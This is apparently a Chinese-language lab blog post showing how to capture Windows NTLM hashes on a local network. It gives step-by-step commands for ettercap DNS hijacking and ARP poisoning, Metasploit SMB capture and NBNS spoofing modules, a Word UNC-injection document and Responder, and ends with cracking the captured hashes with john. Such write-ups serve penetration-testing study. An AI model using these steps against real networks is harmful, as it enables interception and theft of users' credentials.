NTM_HASH获取实验

  1. 目录
  2. 环境
  3. DNS劫持嗅探获取hash
  4. 通过捕获smb流量获取hash
  5. 通过Word获取hash
  6. 使用Responder辅助获取hash

目录

当在内网没有思路的时候可以尝试hash钓鱼来获取突破口,常见的钓鱼方法有

  • DNS劫持,嗅探获取hash
  • SMB伪造,嗅探获取hash
  • Word欺骗,获取hash
  • 使用Responder辅助获取hash

环境

kali:192.168.241.157 
windows server 2008:192.168.241.158

DNS劫持嗅探获取hash

ettercap配置好DNS劫持,先删除/etc/ettercap/etter.dns里面的内容,然后写入

* A  192.168.241.157

uXlrjS.png

执行以下的操作:

ettercap -G
选择网卡
Hosts->Scan for hosts->hosts list

执行以下操作:

选择192.168.241.158这个IP
Mitm->ARP Poisoning

uX1KbQ.png

uX14IA.png

完事,目标机所走的流量都会转发到attack机上

此时启动msfconsole,使用以下模块
uXGqsK.png

之后,受害机无论访问什么网页都会弹出一个框框,要求输出凭证
uXGgMV.png

此时用户如果输入了密码,则会抓到hash
uXJmJs.png

使用john破解捕获到的hash
uXJbfs.png

PS:记得msf里面设置保存的hash路径,否则不会保存文件。我这里拿别人的图(- -!)

通过捕获smb流量获取hash

先用以下模块创建一个临时SMB,然后在启用抓取模块

use auxiliary/server/capture/smb
set srvhost 192.168.241.157
set johnpwfile /root/Desktop_hash
run

uXD13D.png

此时可以看见本地的445端口在工作
uXDYDA.png

启动smb流量监听模块

use auxiliary/nbns/nbns_response
set SPOOFIP 192.168.241.157
set INTERFACE eth0
run

uXrVG8.png

此时只要受害机访问attack的smb服务并输入用户的话将会捕获hash
uXrBIx.png

如图
uXrsJK.png

john破解
uXrqyQ.png

通过Word获取hash

use auxiliary/docx/word_unc_injector
set LHOST 192.168.241.157
run

uXszBd.png

同样使用

use auxiliary/server/capture/smb
set srvhost 192.168.241.157
set johnpwfile /root/Desktop_hash
run

uXyRUI.png

此时在受害机上打开word将捕获到hash
uX2rFA.png

收到hash
uX2ROS.png

使用Responder辅助获取hash

仓库地址:

https://github.com/SpiderLabs/Responder

执行

python Responder.py -i 192.168.241.157 -I eth0

uXTFdf.png

然后在受害机访问192.168.241.157将获取hash
uXTnQs.png

在受害者看来是一个访问错误
uXTJW4.png


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:NTM_HASH获取实验

本文作者:九世

发布时间:2019-10-12, 18:02:09

最后更新:2019-10-12, 20:30:55

原始链接:http://jiushill.github.io/posts/709f1946.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录